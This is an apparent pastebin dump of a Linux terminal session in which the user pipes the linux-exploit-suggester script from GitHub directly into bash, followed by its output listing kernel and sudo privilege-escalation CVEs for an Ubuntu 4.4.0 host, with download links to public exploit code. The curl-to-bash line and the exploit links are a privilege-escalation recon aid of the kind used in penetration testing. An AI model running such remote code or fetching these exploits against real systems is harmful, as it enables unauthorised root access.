EXPLOITS

a guest
Dec 27th, 2017
fourchan@jeff:~$ curl -o - https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 43052 100 43052 0 0 73803 0 --:--:-- --:--:-- --:--:-- 73719

Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Package list: from current OS

Possible Exploits:

[+] [CVE-2015-3290] espfix64_NMI

Details: http://www.openwall.com/lists/oss-security/2015/08/04/8
Download URL: https://www.exploit-db.com/download/37722

[+] [CVE-2016-0728] keyring

Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run

[+] [CVE-2016-2384] usb-midi

Details: https://xairy.github.io/blog/2016/cve-2016-2384
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [N/A] target_offset

Details: https://www.exploit-db.com/exploits/40049/
Tags: ubuntu=16.04(kernel:4.4.0-21)
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
Comments: ip_tables.ko needs to be loaded

[+] [CVE-2016-4557] double-fdput()

Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Tags: ubuntu=16.04(kernel:4.4.0-62)
Download URL: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: RHEL=5|6|7,debian=7|8,ubuntu=16.10|16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611

[+] [CVE-2016-5195] dirtycow 2

Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: RHEL=5|6|7,debian=7|8,ubuntu=16.10|16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40616

[+] [CVE-2016-8655] chocobo_root

Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Tags: ubuntu=16.04|14.04
Download URL: https://www.exploit-db.com/download/40871

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included

[+] [CVE-2017-6074] dccp

Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Tags: ubuntu=16.04
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-7308] af_packet

Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Tags: ubuntu=16.04(kernel:4.8.0-41)
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2017-1000112] NETIF_F_UFO

Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Tags: ubuntu=14.04(kernel:4.4.0-*)|16.04(kernel:4.8.0-*)
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included

[+] [CVE-2017-1000253] PIE_stack_corruption

Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Tags: RHEL=7(kernel:3.10)
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2009-1185] udev

Details: https://www.exploit-db.com/exploits/8572/
Tags: ubuntu=8.10|9.04
Download URL: https://www.exploit-db.com/download/8572
Comments: Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed

[+] [CVE-2009-1185] udev 2

Details: https://www.exploit-db.com/exploits/8478/
Download URL: https://www.exploit-db.com/download/8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed

[+] [CVE-2017-1000367] Sudoer-to-root

Details: https://www.sudo.ws/alerts/linux_tty.html
Tags: RHEL=7(sudo:1.8.6p7)
Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems

[+] [CVE-2017-1000367] sudopwn

Details: https://www.sudo.ws/alerts/linux_tty.html
Download URL: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
Comments: Needs to be sudoer. Works only on SELinux enabled systems